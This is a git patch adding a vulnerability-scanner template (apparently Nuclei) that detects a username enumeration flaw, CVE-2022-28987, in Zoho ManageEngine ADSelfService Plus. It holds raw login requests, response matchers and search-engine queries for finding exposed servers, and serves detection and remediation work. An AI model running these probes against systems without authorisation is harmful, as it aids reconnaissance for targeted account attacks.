From 9d708cfa092049309786f062c7020bd70746fd67 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 29 Jan 2026 12:30:02 +0530 Subject: [PATCH 1/2] Create CVE-2022-28987.yaml --- http/cves/2022/CVE-2022-28987.yaml | 54 ++++++++++++++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 http/cves/2022/CVE-2022-28987.yaml diff --git a/http/cves/2022/CVE-2022-28987.yaml b/http/cves/2022/CVE-2022-28987.yaml new file mode 100644 index 00000000000..58ebe779430 --- /dev/null +++ b/http/cves/2022/CVE-2022-28987.yaml @@ -0,0 +1,54 @@ +id: CVE-2022-28987 + +info: + name: Zoho ManageEngine ADSelfService Plus 6121 - Username Enumeration + author: ritikchaddha + severity: medium + description: | + Zoho ManageEngine ADSelfService Plus 6121 is vulnerable to username enumeration (CVE-2022-28987). The Forgot Password functionality responds differently for existing and non-existing users, allowing attackers to enumerate valid usernames. + reference: + - https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/adselfservice-userenum.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-28987 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2022-28987 + cwe-id: CWE-203 + metadata: + max-request: 2 + verified: false + shodan-query: http.title:"ADSelfService Plus" + fofa-query: title="ADSelfService Plus" + tags: cve,cve2022,zoho,manageengine,user-enum,adselfservice + +http: + - raw: + - | + POST /ServletAPI/accounts/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + loginName=asdfnonexistent + + - | + POST /ServletAPI/accounts/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + loginName=Guest + + matchers-condition: or + matchers: + - type: dsl + dsl: + - 'contains(body, "eSTATUS\":\"Permission Denied")' + - 'contains(content_type, "application/json")' + - 'status_code == 200' + condition: and + + - type: dsl + dsl: + - 'contains(body, "eSTATUS\":\"Your account has been disabled")' + - 'contains(content_type, "application/json")' + - 'status_code == 200' + condition: and From a4deb6cfa0da85f24eb5ea1c85f8c69545fbd5b1 Mon Sep 17 00:00:00 2001 From: Aman Rawat <35992750+theamanrawat@users.noreply.github.com> Date: Thu, 29 Jan 2026 13:03:11 +0530 Subject: [PATCH 2/2] Update CVE-2022-28987.yaml --- http/cves/2022/CVE-2022-28987.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/http/cves/2022/CVE-2022-28987.yaml b/http/cves/2022/CVE-2022-28987.yaml index 58ebe779430..c9308c598c5 100644 --- a/http/cves/2022/CVE-2022-28987.yaml +++ b/http/cves/2022/CVE-2022-28987.yaml @@ -6,6 +6,10 @@ info: severity: medium description: | Zoho ManageEngine ADSelfService Plus 6121 is vulnerable to username enumeration (CVE-2022-28987). The Forgot Password functionality responds differently for existing and non-existing users, allowing attackers to enumerate valid usernames. + impact: | + Attackers can enumerate valid usernames, aiding targeted attacks or account harvesting. + remediation: | + Update to version 6202 or later. reference: - https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/adselfservice-userenum.md - https://nvd.nist.gov/vuln/detail/CVE-2022-28987